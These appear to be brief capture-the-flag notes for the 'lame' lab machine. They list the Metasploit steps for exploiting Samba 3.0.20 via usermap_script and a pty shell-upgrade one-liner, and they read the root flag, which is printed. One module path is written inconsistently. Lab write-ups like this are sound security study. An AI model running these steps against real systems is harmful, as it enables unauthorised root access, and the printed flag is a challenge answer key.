lame

ports open : - 21,22,139,445

vulnerable port open is 139 samba 3.0.20

search exploit in google to find exploit in metasploit usermap_script

service postgresql

msfconsole

search usermap_script

use 0 exploit(multi/handler/usermap_script

show options

set rhost

set lhost

exploit

python3 -c 'import pty; pty.spawn("/bin/bash")'

cd /root

wc -l root.txt

cat root.txt

root flag : - b13f3f2328f6e6d93d06f31db5d97973

Last updated